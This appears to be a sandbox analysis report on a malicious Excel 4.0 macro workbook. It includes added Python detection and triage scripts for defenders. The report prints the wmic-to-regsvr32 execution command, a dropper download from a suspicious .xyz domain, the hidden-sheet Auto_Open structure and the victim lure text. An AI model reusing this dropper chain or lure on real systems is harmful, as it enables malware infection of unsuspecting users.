
Analysis Report Documents (252).xlsm

Overview

General Information

Sample Name: Documents (252).xlsm
Analysis ID: 382991
MD5: 966c13f10fa0b3bfe75da87bca817396
SHA1: 1769db2ec1d019b526e63637a413ceab10d00ff3
SHA256: 963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14
Detection

Hidden Macro 4.0
Score: 96 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Wmic Launch regsvr32
Contains functionality to create processes via WMI
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office document connecting to suspicious TLD
Outdated Microsoft Office dropper detected
Performs DNS queries to domains with low reputation
Potential document exploit detected (performs DNS queries with low reputation score)
Excel document contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2208 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 5316 cmdline: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref' MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • regsvr32.exe (PID: 5488 cmdline: regsvr32 -s C:/Users/Public/dbhfr.xref MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup

Note: regsvr32.exe appears as a top-level entry rather than under WMIC.exe because it was started through Win32_Process::Create (see the WMI query recorded below). A process created that way is a child of the WMI provider host (WmiPrvSE.exe), not of the caller, so parent-child detections that expect EXCEL.EXE or WMIC.exe as the parent of regsvr32.exe will not fire on this chain; the Sigma rule below keys on the WMIC command line instead.

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Wmic Launch regsvr32
Source: Process startedAuthor: Joe Security: Data: Command: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref', CommandLine: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref', CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2208, ProcessCommandLine: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref', ProcessId: 5316
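The Sigma hit above matches on the WMIC command line, not on the regsvr32 child, and that choice is what makes it survive the broken process lineage: Win32_Process::Create runs in the WMI provider host, so regsvr32.exe is parented by WmiPrvSE.exe rather than by WMIC.exe or EXCEL.EXE. The Python below is an added example (it is neither Joe Sandbox code nor the Sigma rule itself) that applies three checks from this report to Sysmon Event ID 1 style records: the wmic/regsvr32 rule, the Office-spawns-wmic "process start blacklist" rule, and a regsvr32 rule that flags a silent registration of a file whose extension is not a COM module. The records are constructed from the command lines in this report; the EXCEL.EXE parent (explorer.exe) and the benign `wmic.exe os get caption` record are assumptions added for contrast.

```python
"""Process-creation detection for the chain in this report:
EXCEL.EXE -> wmic.exe process call create -> (WmiPrvSE.exe) -> regsvr32.exe.

Added example. EVENTS are Sysmon Event ID 1 style records constructed from the
command lines in the report, plus one benign wmic invocation for contrast.
"""
import re

EVENTS = [
    {"Image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "CommandLine": r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding",
     "ParentImage": r"C:\Windows\explorer.exe"},                      # parent assumed
    {"Image": r"C:\Windows\SysWOW64\wbem\WMIC.exe",
     "CommandLine": "wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'",
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"},
    # Win32_Process.Create runs inside the WMI provider host, so the child is
    # parented by WmiPrvSE.exe, not by WMIC.exe or EXCEL.EXE (hence the
    # top-level regsvr32.exe entry in the report's Startup tree).
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 -s C:/Users/Public/dbhfr.xref",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",                   # benign, constructed
     "CommandLine": "wmic.exe os get caption",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe")
PROCESS_CREATE = re.compile(r"\bprocess\s+call\s+create\b")
REGSVR32_TARGET = re.compile(r"(?i)regsvr32(?:\.exe)?\s+(?:/s|-s)\s+\"?([^\s\"]+)")
DLL_EXTENSIONS = (".dll", ".ocx", ".ax")


def wmic_launches_regsvr32(ev):
    """Same idea as the Sigma hit: wmic 'process call create' whose payload runs regsvr32.
    Keying on the caller's command line is what keeps the WmiPrvSE parent from mattering."""
    cl = ev["CommandLine"].lower()
    return (ev["Image"].lower().endswith("\\wmic.exe")
            and PROCESS_CREATE.search(cl) is not None
            and "regsvr32" in cl)


def office_spawns_wmic(ev):
    """Office application directly spawning wmic.exe (the 'process start blacklist' hit)."""
    return (ev["ParentImage"].lower().endswith(OFFICE_APPS)
            and ev["Image"].lower().endswith("\\wmic.exe"))


def regsvr32_loads_non_dll(ev):
    """regsvr32 /s or -s on a file whose extension is not a registrable COM module
    (here a .xref under C:/Users/Public), regardless of who the parent is."""
    if not ev["Image"].lower().endswith("\\regsvr32.exe"):
        return False
    m = REGSVR32_TARGET.search(ev["CommandLine"])
    if not m:
        return False
    return not m.group(1).lower().endswith(DLL_EXTENSIONS)


RULES = (
    ("wmic_launches_regsvr32", wmic_launches_regsvr32),
    ("office_spawns_wmic", office_spawns_wmic),
    ("regsvr32_loads_non_dll", regsvr32_loads_non_dll),
)


def detect(events):
    """Return (rule_name, command_line) pairs for every record that trips a rule."""
    return [(name, ev["CommandLine"]) for ev in events for name, rule in RULES if rule(ev)]


if __name__ == "__main__":
    for name, cl in detect(EVENTS):
        print(f"{name:24s} {cl}")
```

Run against the constructed records, each of the three malicious records trips exactly one rule and the benign wmic call trips none. The regsvr32 rule is the one worth keeping even when the WMI hop is replaced by something else, because it needs no parent information at all.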

Signature Overview

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\wbem\WMIC.exe
Potential document exploit detected (performs DNS queries with low reputation score)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; DNS query: name: xherzog24pv.xyz
Source: global traffic; DNS query: name: xherzog24pv.xyz

Networking:

Office document connecting to suspicious TLD
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; DNS traffic detected: xherzog24pv.xyz
Outdated Microsoft Office dropper detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; DNS query: xherzog24pv.xyz is down
Performs DNS queries to domains with low reputation
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; DNS query: xherzog24pv.xyz
Source: unknown; DNS traffic detected: query: xherzog24pv.xyz, reply code: Name error (3). That is NXDOMAIN: the domain no longer resolves, which is consistent with the URLDownloadToFileA retrieval of C:/Users/Public/dbhfr.xref failing before regsvr32 -s was invoked on it, so the second stage was not observed in this run.
Source: unknown; DNS traffic detected: queries for: xherzog24pv.xyz
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr (dropped file); strings found in binary or memory. These are all Microsoft Office service endpoints embedded in the Office-generated file; the only DNS query actually observed during the run is the one for xherzog24pv.xyz above.
http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
http://weather.service.msn.com/data.aspx
https://addinslicensing.store.office.com/commerce/query
https://analysis.windows.net/powerbi/api
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
https://api.aadrm.com/
https://api.addins.omex.office.net/appinfo/query
https://api.addins.omex.office.net/appstate/query
https://api.addins.store.office.com/app/query
https://api.cortana.ai
https://api.diagnostics.office.com
https://api.diagnosticssdf.office.com
https://api.microsoftstream.com/api/
https://api.office.net
https://api.onedrive.com
https://api.powerbi.com/beta/myorg/imports
https://api.powerbi.com/v1.0/myorg/datasets
https://api.powerbi.com/v1.0/myorg/groups
https://apis.live.net/v5.0/
https://arc.msn.com/v4/api/selection
https://asgsmsproxyapi.azurewebsites.net/
https://augloop.office.com
https://augloop.office.com/v2
https://autodiscover-s.outlook.com/
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
https://cdn.entity.
https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
https://client-office365-tas.msedge.net/ab
https://clients.config.office.net/
https://clients.config.office.net/user/v1.0/android/policies
https://clients.config.office.net/user/v1.0/ios
https://clients.config.office.net/user/v1.0/mac
https://clients.config.office.net/user/v1.0/tenantassociationkey
https://cloudfiles.onenote.com/upload.aspx
https://config.edge.skype.com
https://config.edge.skype.com/config/v1/Office
https://config.edge.skype.com/config/v2/Office
https://cortana.ai
https://cortana.ai/api
https://cr.office.com
https://dataservice.o365filtering.com
https://dataservice.o365filtering.com/
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
https://dev.cortana.ai
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
https://dev0-api.acompli.net/autodetect
https://devnull.onenote.com
https://directory.services.
https://ecs.office.com/config/v2/Office
https://entitlement.diagnostics.office.com
https://entitlement.diagnosticssdf.office.com
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
https://globaldisco.crm.dynamics.com
https://graph.ppe.windows.net
https://graph.ppe.windows.net/
https://graph.windows.net
https://graph.windows.net/
https://hubblecontent.osi.office.net/contentsvc/api/telemetry
https://hubblecontent.osi.office.net/contentsvc/browse?
https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
https://hubblecontent.osi.office.net/contentsvc/microsofticon?
https://incidents.diagnostics.office.com
https://incidents.diagnosticssdf.office.com
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
https://insertmedia.bing.office.net/odc/insertmedia
https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
https://lifecycle.office.com
https://login.microsoftonline.com/
https://login.windows-ppe.net/common/oauth2/authorize
https://login.windows.local
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
https://login.windows.net/common/oauth2/authorize
https://loki.delve.office.com/api/v1/configuration/officewin32/
https://lookup.onenote.com/lookup/geolocation/v1
https://management.azure.com
https://management.azure.com/
https://messaging.office.com/
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
https://ncus.contentsync.
https://ncus.pagecontentsync.
https://o365auditrealtimeingestion.manage.office.com
https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
https://o365diagnosticsppe-web.cloudapp.net
https://ocos-office365-s2s.msedge.net/ab
https://ofcrecsvcapi-int.azurewebsites.net/
https://officeapps.live.com
https://officeci.azurewebsites.net/api/
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
https://officesetup.getmicrosoftkey.com
https://ogma.osi.office.net/TradukoApi/api/v1.0/
https://omex.cdn.office.net/addinclassifier/officeentities
https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
https://onedrive.live.com
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
https://onedrive.live.com/embed?
https://outlook.office.com/
https://outlook.office.com/autosuggest/api/v1/init?cvid=
https://outlook.office365.com/
https://outlook.office365.com/api/v1.0/me/Activities
https://outlook.office365.com/autodiscover/autodiscover.json
https://ovisualuiapp.azurewebsites.net/pbiagave/
https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
https://portal.office.com/account/?ref=ClientMeControl
https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
https://powerlift-frontdesk.acompli.net
https://powerlift.acompli.net
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
https://prod-global-autodetect.acompli.net/autodetect
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
https://res.getmicrosoftkey.com/api/redemptionevents
https://rpsticket.partnerservices.getmicrosoftkey.com
https://settings.outlook.com
https://shell.suite.office.com:1443
https://skyapi.live.net/Activity/
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
https://staging.cortana.ai
https://storage.live.com/clientlogs/uploadlocation
https://store.office.cn/addinstemplate
https://store.office.com/?productgroup=Outlook
https://store.office.com/addinstemplate
https://store.office.de/addinstemplate
https://store.officeppe.com/addinstemplate
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
https://tasks.office.com
https://templatelogging.office.com/client/log
https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
https://visio.uservoice.com/forums/368202-visio-on-devices
https://web.microsoftstream.com/video/
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
https://webshell.suite.office.com
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
https://wus2.contentsync.
https://wus2.pagecontentsync.
https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
https://www.odwebp.svc.ms

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4; Screenshot OCR: Enable Editing" from the yellow bar above @ Once You have Enable Editing, please click "Enable Con
Source: Screenshot number: 4; Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? m You are using iOS or
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000001.00000002.219131181.0000000002FA0000.00000004.00000020.sdmp; Binary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'C:\Windows\System32\Wbem\wmic.exeWinSta0\Default=::=::\=C:=C:\Users\user\DocumentsALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=MXPXCVPUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsic
Found Excel 4.0 Macro with suspicious formulas
Source: Documents (252).xlsm; Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: Documents (252).xlsm; Initial sample: Sheet size: 88698
Source: workbook.xml; Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="23127"/><workbookPr defaultThemeVersion="124226"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Janadark\3D Objects\corp\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="8_{29DC8E7E-AE72-4A96-8469-EA40E9BC458E}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15840" firstSheet="1" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="dbapi &quot;=sd" sheetId="4" state="hidden" r:id="rId1"/><sheet name="FrameSecure" sheetId="5" r:id="rId2"/></sheets><definedNames><definedName name="dontdoit" function="1" xlm="1">-676986879</definedName><definedName name="okwell" function="1" xlm="1">124715010</definedName><definedName name="plzno" function="1" xlm="1">-709623808</definedName><definedName name="_xlnm.Auto_Open">'dbapi "=sd'!$AA$6</definedName></definedNames><calcPr calcId="144525"/></workbook>
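The workbook.xml above carries the whole "hidden Excel 4.0 macro" pattern in three places: a sheet with state="hidden" (a veryHidden sheet is equivalent for triage), definedName entries flagged xlm="1", and an _xlnm.Auto_Open name whose target cell ('dbapi "=sd'!$AA$6) lies on that hidden sheet, so the macro runs as soon as content is enabled and the user sees only the visible "FrameSecure" lure sheet. The script below is an added example (not part of the report or of Joe Sandbox) that pulls these indicators out of an .xlsm. It wraps a trimmed copy of the report's workbook.xml in an in-memory zip so it runs without the sample, and it reads only workbook.xml; the formula content (the EXEC call and the 88698-byte sheet flagged above) lives in the macrosheet parts and still needs a tool such as olevba.

```python
"""Triage xl/workbook.xml of an OOXML spreadsheet for Excel 4.0 (XLM) macro
indicators: hidden/veryHidden sheets, definedNames flagged xlm="1", and an
Auto_Open name whose target cell sits on a hidden sheet.

Added example; WORKBOOK_XML is the report's workbook.xml trimmed to the
elements that matter, and the surrounding zip is constructed in memory.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

# Trimmed from the report's workbook.xml (namespaces unrelated to the
# indicators were dropped).
WORKBOOK_XML = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheets>
    <sheet name="dbapi &quot;=sd" sheetId="4" state="hidden" r:id="rId1"/>
    <sheet name="FrameSecure" sheetId="5" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="dontdoit" function="1" xlm="1">-676986879</definedName>
    <definedName name="okwell" function="1" xlm="1">124715010</definedName>
    <definedName name="plzno" function="1" xlm="1">-709623808</definedName>
    <definedName name="_xlnm.Auto_Open">'dbapi "=sd'!$AA$6</definedName>
  </definedNames>
</workbook>"""

# Defined-name references look like 'Sheet Name'!$A$1 (quoted, with '' for a
# literal apostrophe) or Sheet1!$A$1 (unquoted).
_SHEET_REF = re.compile(r"^'((?:[^']|'')*)'!|^([^!']+)!")


def sheet_of(ref):
    """Return the sheet name a defined-name reference points at, or None."""
    m = _SHEET_REF.match(ref)
    if not m:
        return None
    return (m.group(1) or m.group(2)).replace("''", "'")


def triage_workbook_xml(xml_bytes):
    root = ET.fromstring(xml_bytes)
    hidden = {}
    for sheet in root.findall("m:sheets/m:sheet", NS):
        state = sheet.get("state", "visible")
        if state in ("hidden", "veryHidden"):
            hidden[sheet.get("name")] = state
    xlm_names = []
    auto_open = None
    for dn in root.findall("m:definedNames/m:definedName", NS):
        if dn.get("xlm") == "1":
            xlm_names.append(dn.get("name"))
        if dn.get("name") == "_xlnm.Auto_Open":
            auto_open = (dn.text or "").strip()
    return {
        "hidden_sheets": hidden,
        "xlm_defined_names": xlm_names,
        "auto_open": auto_open,
        "auto_open_on_hidden_sheet": bool(auto_open) and sheet_of(auto_open) in hidden,
    }


def triage_xlsm(fileobj):
    """fileobj: path or file-like object of an .xlsm/.xlsx (a zip container)."""
    with zipfile.ZipFile(fileobj) as z:
        return triage_workbook_xml(z.read("xl/workbook.xml"))


def is_hidden_xlm_autoopen(result):
    """The report's pattern: Auto_Open lands on a hidden sheet and XLM names exist.
    Either indicator alone is weak (legitimate add-ins hide sheets too)."""
    return result["auto_open_on_hidden_sheet"] and bool(result["xlm_defined_names"])


def build_sample_xlsm():
    """Wrap WORKBOOK_XML in a minimal zip so triage_xlsm() can be exercised offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", WORKBOOK_XML)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    res = triage_xlsm(build_sample_xlsm())
    print(res)
    print("hidden XLM Auto_Open:", is_hidden_xlm_autoopen(res))
```

On a real sample, `triage_xlsm("Documents (252).xlsm")` reads workbook.xml straight out of the container; no Excel is involved, so the macro cannot fire during triage.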
Source: C:\Windows\System32\regsvr32.exe; Section loaded: sfc.dll
Source: classification engine; Classification label: mal96.troj.expl.evad.winXLSM@5/14@1/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{9B76BBAA-F792-4814-A6ED-571A218FDF96} - OProcSessId.dat
Source: C:\Windows\SysWOW64\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\wbem\WMIC.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:/Users/Public/dbhfr.xref
Source: C:\Windows\SysWOW64\wbem\WMIC.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: Documents (252).xlsm; Initial sample: OLE zip file path = xl/media/image1.png
Source: Documents (252).xlsm; Initial sample: OLE zip file path = xl/media/image2.png
Source: Documents (252).xlsm; Initial sample: OLE zip file path = xl/media/image3.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Windows\SysWOW64\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (63 identical entries in the report)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: WMIC.exe, 00000001.00000002.219191169.00000000030A0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.219025222.0000000002620000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WMIC.exe, 00000001.00000002.219191169.00000000030A0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.219025222.0000000002620000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WMIC.exe, 00000001.00000002.219191169.00000000030A0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.219025222.0000000002620000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WMIC.exe, 00000001.00000002.219191169.00000000030A0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.219025222.0000000002620000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Windows Management Instrumentation 21, Scripting 21, Exploitation for Client Execution 31, At (Windows), Cron
Persistence: DLL Side-Loading 1, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Privilege Escalation: Process Injection 1, DLL Side-Loading 1, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Defense Evasion: Masquerading 1, Disable or Modify Tools 1, Process Injection 1, Scripting 21, DLL Side-Loading 1
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Security Software Discovery 1, File and Directory Discovery 1, System Information Discovery 3, System Network Configuration Discovery, Remote System Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Non-Application Layer Protocol 1, Application Layer Protocol 1, Steganography, Protocol Impersonation, Fallback Channels
